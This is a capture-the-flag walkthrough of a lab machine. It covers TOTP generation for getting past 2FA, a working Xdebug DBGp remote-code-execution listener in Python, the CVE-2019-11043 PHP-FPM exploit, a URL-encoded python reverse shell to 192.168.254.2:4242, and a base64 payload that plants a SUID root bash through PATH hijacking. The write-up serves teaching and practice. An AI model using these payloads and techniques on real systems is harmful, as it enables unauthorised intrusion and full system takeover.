In this post, I want to share a walkthrough of the Static machine.

This machine is rated as Hard difficulty.

Information Gathering on Static Machine

Once we have started the VPN connection, we can begin information gathering on the machine by running nmap -sC -sV <IP Address> -Pn (-Pn skips host discovery, so the scan goes ahead even if the target does not answer ping).

From the result, we found a few open ports, including:

  • 21: vsftpd 3.0.3
  • 22: OpenSSH 8.2p1
  • 80: gunicorn

Let's access the web interface at static.htb:8080/.ftp_uploads/

There are two files that we can see here.

When I try to open warning.txt

We will need to download db.sql.gz onto our machine and try to look at what is stored in the file.

Unfortunately, the file has been corrupted, just as mentioned in warning.txt.

Let's do some research on how to recover the file.

The search results didn't show anything useful at first. Let's scroll down and hope to find a useful tool.

We managed to find a tool called gzrecover on GitHub.

Gaining Access on Static Machine

The tool can be downloaded here.

Once gzrecover is fully installed, we can run it with the command sudo ./gzrecover db.sql.gz (root is not actually required here; the tool only reads the archive and writes the recovered output to a new file).

We managed to recover the file; let's read what has been recovered.

The recovered file contains some encrypted values, but it clearly shows MySQL statements. After decrypting them, you will find that credentials are stored there:

  • username=admin
  • password=admin

Trying to bypass 2FA authentication

We notice from our nmap result that static.htb:8080 has a directory /vpn/.

I found that login.php is served from the /vpn/ directory, which leads to a login page.

Once you have entered the credentials on the login page, it will redirect to a 2FA Enabled page that looks something like the one shown above.

We will need to bypass the 2FA by running the command above.

It will show an Internal IT Support portal where you generate a VPN configuration for any name, and a new VPN config will be downloaded to your machine.
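A second factor that is a time-based one-time code (TOTP, RFC 6238) can be completed without the enrolled phone whenever the shared seed is available to the attacker. The following is an added example, not the command from the original post (which is only shown as an image), and it assumes the seed was obtained from the recovered database; the post does not state that, and the seed used here is the RFC 6238 reference secret "12345678901234567890" in base32, constructed for the example. It shows both the generation side (what an attacker runs) and the server-side verification with a skew window, which is the part defenders get wrong.

```python
import base64
import hashlib
import hmac
import struct
import time
from typing import Optional

# Constructed seed for this example: the RFC 6238/4226 reference secret
# "12345678901234567890" encoded as base32. Not a value from the target.
EXAMPLE_SEED_B32 = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"


def decode_base32_seed(seed_b32: str) -> bytes:
    """Decode a seed the way authenticator apps store it: case-insensitive,
    spaces allowed, '=' padding optional."""
    cleaned = seed_b32.strip().replace(" ", "").upper()
    cleaned += "=" * (-len(cleaned) % 8)
    return base64.b32decode(cleaned)


def hotp(secret: bytes, counter: int, digits: int = 6, algo=hashlib.sha1) -> str:
    """RFC 4226 HOTP: HMAC over the 8-byte big-endian counter, dynamic
    truncation at the offset given by the low nibble of the last byte,
    then reduce modulo 10^digits and left-pad with zeros."""
    mac = hmac.new(secret, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F
    binary = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(binary % (10 ** digits)).zfill(digits)


def totp(seed_b32: str, at: Optional[int] = None, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP with counter = floor(unix_time / step).
    `at` is a unix timestamp; None means 'now'."""
    now = int(time.time()) if at is None else at
    return hotp(decode_base32_seed(seed_b32), now // step, digits)


def verify_totp(seed_b32: str, code: str, at: Optional[int] = None,
                step: int = 30, window: int = 1) -> bool:
    """Server-side check: accept the current step and +/- `window` adjacent
    steps to tolerate clock skew. Uses a constant-time comparison so the
    digits cannot be guessed one at a time from timing."""
    now = int(time.time()) if at is None else at
    secret = decode_base32_seed(seed_b32)
    base = now // step
    return any(hmac.compare_digest(hotp(secret, base + delta), code)
               for delta in range(-window, window + 1))


if __name__ == "__main__":
    # Prints the code that is valid right now for the example seed.
    print("current code:", totp(EXAMPLE_SEED_B32))
```

Note that with window=1 a code is accepted for roughly 90 seconds, and a server without rate limiting on the 2FA form is brute-forceable (one million codes, three of them valid at any time); both are worth checking on a real engagement.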

Downloading the OpenVPN config

From the VPN file, I notice that another subdomain, vpn.static.htb, is written there.

Let's connect with the VPN file that we downloaded earlier.

We should route 172.20.0.0/24 through the OpenVPN tunnel.

We should then be able to reach 172.20.0.10, which hosts the data.php file.

Let's start our nc listener on our machine.

We should start the exploit by running python2 exploit.py

## I've renamed the python file to milk.py ##

I tried the command above, but nothing happened on my nc listener.

It works with this payload though.

After entering the reverse shell payload, you should access 172.20.0.10/data.php?XDEBUG_SESSION_START=phpstorm (the XDEBUG_SESSION_START parameter is what tells Xdebug to open a debugging session back to the requesting client, which is the connection the exploit's listener is waiting for).

Voila! As a result, we got the reverse shell connection back to us.
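The request above only works because Xdebug, when told to start a session, connects back to the client and speaks the DBGp debugger protocol, in which an IDE may ask the engine to eval arbitrary PHP. The following is an added example of that mechanism, written here and not the post's exploit.py (whose contents are not shown): a minimal DBGp listener that waits for the engine to connect, consumes its init message, sends one eval command and decodes the reply. The port 9000 (Xdebug 2's default), the shell_exec("id") probe and the sample messages in the parser are assumptions and constructed data, not values from the original page.

```python
import base64
import socket
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple

# Assumptions for this example (none of this comes from the original post):
# the engine on the target connects back to the requesting client on DBGp
# port 9000 (Xdebug 2's default), and we first want the output of `id`.
LISTEN_PORT = 9000
PHP_PROBE = 'shell_exec("id")'


def dbgp_eval_command(transaction_id: int, php_code: str) -> bytes:
    """Build a DBGp 'eval' command. The PHP expression travels base64-encoded
    after '--', and every IDE->engine command is terminated by a NUL byte."""
    b64 = base64.b64encode(php_code.encode()).decode()
    return f"eval -i {transaction_id} -- {b64}\x00".encode()


def parse_dbgp_messages(buf: bytes) -> Tuple[List[str], bytes]:
    """Split engine->IDE bytes into DBGp messages.

    Wire format: b'<decimal length>\\x00<xml of that length>\\x00'. Returns the
    complete XML payloads plus the leftover bytes of any partial message, so
    the caller can keep appending recv() output to them."""
    messages: List[str] = []
    while True:
        sep = buf.find(b"\x00")
        if sep == -1:
            return messages, buf                 # length prefix not complete yet
        length = int(buf[:sep].decode())
        start, end = sep + 1, sep + 1 + length
        if len(buf) < end + 1:                   # payload or its trailing NUL missing
            return messages, buf
        messages.append(buf[start:end].decode(errors="replace"))
        buf = buf[end + 1:]


def eval_result(response_xml: str) -> Optional[str]:
    """Extract the value from an <response command="eval"> message. The engine
    wraps it in a <property> (default namespace urn:debugger_protocol_v1)
    whose text is base64 when encoding="base64". Returns None on an error
    response, which carries <error> instead of <property>."""
    root = ET.fromstring(response_xml)
    prop = root.find(".//{*}property")
    if prop is None:
        return None
    text = prop.text or ""
    if prop.get("encoding") == "base64":
        return base64.b64decode(text).decode(errors="replace")
    return text


def recv_messages(conn: socket.socket, buf: bytes) -> Tuple[List[str], bytes]:
    """Read from the engine until at least one full DBGp message is buffered."""
    while True:
        msgs, buf = parse_dbgp_messages(buf)
        if msgs:
            return msgs, buf
        chunk = conn.recv(4096)
        if not chunk:
            raise ConnectionError("engine closed the DBGp session")
        buf += chunk


def serve_once(php_code: str = PHP_PROBE, port: int = LISTEN_PORT,
               timeout: float = 60.0) -> Optional[str]:
    """Wait for one engine to connect back (triggered by the
    XDEBUG_SESSION_START request), consume its <init> message, send a single
    eval and return the engine's reply value."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen(1)
        srv.settimeout(timeout)
        conn, _peer = srv.accept()
        with conn:
            conn.settimeout(timeout)
            _init, buf = recv_messages(conn, b"")   # the engine speaks first
            conn.sendall(dbgp_eval_command(1, php_code))
            replies, _ = recv_messages(conn, buf)
            return eval_result(replies[0])


if __name__ == "__main__":
    print("waiting for xdebug to connect back on port", LISTEN_PORT)
    print(serve_once())
```

Run the listener, then request the page with XDEBUG_SESSION_START set; the printed value is whatever the PHP expression returned. Swapping PHP_PROBE for a shell_exec() of a reverse-shell one-liner turns the probe into the shell the post obtains. The defensive takeaway is the same either way: xdebug.remote_connect_back accepts the connect-back address from the request, so a production host with it enabled is remote code execution for anyone who can send an HTTP request.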

Finally, we should be able to read the user flag by typing cat user.txt

Escalate to Root Privileges

Next, we need to transfer ncat from our machine to the victim's machine.

We should set up port forwarding by running ssh -N -L <anyport>:192.168.254.3:80 -i id_rsa [email protected] so that the web server on 192.168.254.3 is reachable on our local port.

Next, we exploit it with ./phuip-fpizdam http://localhost:<anyport>/index.php (phuip-fpizdam is the public exploit for CVE-2019-11043 in PHP-FPM behind nginx; it goes through the forwarded port because 192.168.254.3 is only reachable over the SSH tunnel).

Then, we open the URL below in the browser (the a= parameter carries a URL-encoded python3.6 reverse shell that connects back to 192.168.254.2:4242):

localhost:<anyport>/index.php?a=/usr/bin/python3.6%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.254.2%22%2C4242))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3Bos.dup2(s.fileno()%2C2)%3Bimport%20pty%3B%20pty.spawn(%22%2Fbin%2Fbash%22)%27%0A

Finally, we managed to get the reverse shell connection back to us.

Let's execute the following command:

echo 'IyEvYmluL2Jhc2gKL2Jpbi9jcCAvYmluL2Jhc2ggL3RtcC9iYXNoIC0tbm8tcHJlc2VydmU9YWxsCi9iaW4vY2hvd24gcm9vdDpyb290IC90bXAvYmFzaAovYmluL2NobW9kIDQ3NzcgL3RtcC9iYXNoCg==' | base64 -d > /tmp/readlink

The base64 decodes to a short bash script: it copies /bin/bash to /tmp/bash, chowns it to root:root and chmods it 4777, i.e. sets the SUID bit. The chown and chmod only succeed because ersatool, which is SUID root, is the one that ends up running the script.

After that, we rename the readlink file to sed. The name matters only in that it must be a command ersatool runs by bare name, so that the PATH lookup finds our file before the real binary.

Once the file is renamed, make sure it is executable and run export PATH=/tmp:$PATH before proceeding to the next step.

Once that has been done, we can now execute the following commands:

  • /usr/bin/ersatool
  • create
  • x
  • enter
  • exit

Eventually, we should be able to see the bash file in the /tmp/ directory.

Next, we run ./bash -p from the /tmp/ directory (-p stops bash from dropping the effective UID, so the SUID root bit is kept).

Finally, we should be able to read the root flag by running cat /root/root.txt

